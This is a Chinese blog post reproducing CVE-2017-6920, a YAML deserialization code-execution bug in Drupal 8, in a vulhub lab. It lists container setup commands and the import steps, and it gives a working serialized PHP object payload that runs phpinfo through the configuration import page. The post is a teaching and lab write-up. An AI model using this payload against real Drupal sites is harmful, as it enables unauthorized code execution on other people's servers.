Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920)

最新推荐文章于 2023-12-29 15:40:56 发布
最新推荐文章于 2023-12-29 15:40:56 发布
阅读量591 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117324824
版权

漏洞背景

Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal 8.0.0版本至8.3.4之前版本中存在远程代码执行漏洞,该漏洞源于PECL YAML解析器没有安全的处理PHP对象。远程攻击者可利用该漏洞在受影响应用程序上下文中执行任意代码或造成拒绝服务。

影响版本

Drupal Drupal 8.0.0 - 8.3.4

漏洞复现

我这里用的是vulhub的环境,需要基础配置,我这里也会放出来:

#获得一个靶机的shell交互界面,CONTAINER换成自己的容器ID
docker exec -i -t CONTAINER /bin/bash
# 换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源
cat > sources.list << EOF
deb http://mirrors.163.com/debian/ jessie main non-free contrib
deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib
deb http://mirrors.163.com/debian/ jessie-backports main non-free contrib
deb-src http://mirrors.163.com/debian/ jessie main non-free contrib
deb-src http://mirrors.163.com/debian/ jessie-updates main non-free contrib
deb-src http://mirrors.163.com/debian/ jessie-backports main non-free contrib
deb http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib
deb-src http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib
EOF
# 安装依赖
apt update
apt-get -y install gcc make autoconf libc-dev pkg-config
apt-get -y install libyaml-dev
# 安装yaml扩展
pecl install yaml
docker-php-ext-enable yaml.so
# 启用 yaml.decode_php 否则无法复现成功
echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini
# 退出容器
exit
# 重启容器,CONTAINER换成自己的容器ID
docker restart CONTAINER

完成以上步骤后,再看以下步骤:

  • 1.登录一个管理员账号
  • 2.访问 http://127.0.0.1:8080/admin/config/development/configuration/single/import
  • 3.如下图所示,Configuration type 选择 Simple configurationConfiguration name 任意填写,Paste your configuration here 中填写PoC如下:
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

在这里插入图片描述
完成后点击Import就能够执行phpinfo了!
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[ vulhub漏洞复现篇 ] Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920)
qq_51577576的博客
02-17 739
[ vulhub漏洞复现篇 ] Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920Drupal是使用PHP语言编写的开源内容管理框架,它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。CVE-2017- 6920Drupal CoreYAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core
Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 CVE-2017-6920 漏洞复现
ADummy的博客
02-24 693
Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞CVE-2017-6920) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>信息被爆出 0x01漏洞介绍 ​ Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。 影响版本 Drupal < 8.3.4 0x02漏洞复现 ​ 先安装 yaml 扩展 !!!需要先
Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞CVE-2017-6920
07-19 808
漏洞背景:2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920漏洞,影响为Critical。这是Drupal CoreYAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core漏洞复现:1.打开网页先登录一个管理员账号。2.访问 http://你的ip:8080/admin/config/development/configura...
Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340)
07-10
使用docker-compose命令一步搭建Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340) 的漏洞环境
Drupal 曝出代码执行高危漏洞,数百万网站受影响
weixin_33713350的博客
02-24 140
百度智能云 云生态狂欢季 热门云产品1折起>>> Drupal 开源内容管理系统曝出了一个允许黑客远...
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 1865
drupal命令执行
CVE-2018-7600】Drupal 8 远程代码执行漏洞
Mr_atopos的博客
06-07 2905
使用vulhub搭建环境使用vulhub搭建环境出现了一些问题,这里直接使用BUU的环境 BUU CEV-2018-7600进去也要初始化环境,一开始语言选择英文,数据库选择SQLite 其他的可以随便设置 进入 这个漏洞可能出现在填写表单的地方,该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置可以利用注册用户来进行漏洞利用先随便输入测试 通过查阅 Drupal代码和文档,可以知道,对于
站长们注意啦!开源CMS Drupal 8发布更新修复多处高危漏洞补丁,提示您升级
weixin_34268310的博客
08-21 127
据外媒报道, Drupal 研究人员于 8 月 16 日发布安全报告,宣称已修复 Drupal 8 多处漏洞并在线更新安全补丁。研究显示这些漏洞影响 Drupal 8 多个系统组件,包括实体访问系统、REST API 与部分视图组件。 CVE-2017-6925 研究人员发现 Drupal 8.3.7 中存在一处高危漏洞CVE-2017-6925),影...
Drupal YAML 反序列化代码执行漏洞(CVE-2017-6920)
errorr0
07-28 448
yaml php反序列化
代码审计之CVE-2017-6920 Drupal远程代码执行漏洞学习
weixin_30256505的博客
03-07 616
1.背景介绍: CVE-2017-6920Drupal CoreYAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal CoreDrupal介绍:Drupal 是一个由Dries Buytaert创立的自由开源的内容管理系统,用PHP语言写成。在业界Drupal常被视为内容管理框架(CMF),而非一般意义上的内容管理系统(CMS)。Drupal目录:/ven...
drupal-cve_2017_6920
最新发布
m0_65150886的博客
12-29 403
Drupal官方发布了一个编号为CVE-2017- 6920漏洞,影响为Critical。这是Drupal CoreYAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。序列化一个GuzzleHttp\Psr7\FnStream类,并如图操作。点击import按钮,就会执行phpinfo函数。密码admin123。
漏洞分析】Drupal 远程代码执行CVE-2017-6920
蚁景网安学院
07-13 655
前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多,大多都只是简单的复现了,于是就想着对这个漏洞进行一个详细的分析......
漏洞分析」Drupal 远程代码执行CVE-2017-6920
蚁景网安学院
07-13 314
前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多,大多都只是简单的复现了,于是就想着对这个漏洞进行一个详细的分析。漏洞描述环境搭建环境的搭建,我们可以选择 p神 的 Vulhub 上的环境,我们也可以利用 vulfocus 的在线环境,或...
drupal 执行.php文件,CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造
weixin_35408656的博客
04-06 492
作者: 启明星辰ADLab0x01 漏洞描述2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920漏洞,影响为Critical。这是Drupal CoreYAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。0x02 漏洞分析通过diff 8.3.3与8.3.4的文件可以发现漏洞的触发点,如下图:可以看到,8.3.4 decode...
"drupal < 7.32 \"drupalgeddon\" sql injection vulnerability (cve-2014-3704)漏洞"
10-28
Drupal 版本中存在一个名为“Drupalgeddon”的SQL注入漏洞漏洞编号为CVE-2014-3704。 SQL注入是一种常见的网络安全漏洞,它允许攻击者通过在输入中注入恶意的SQL代码来干扰或绕过应用程序的数据库查询。在Drupal...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值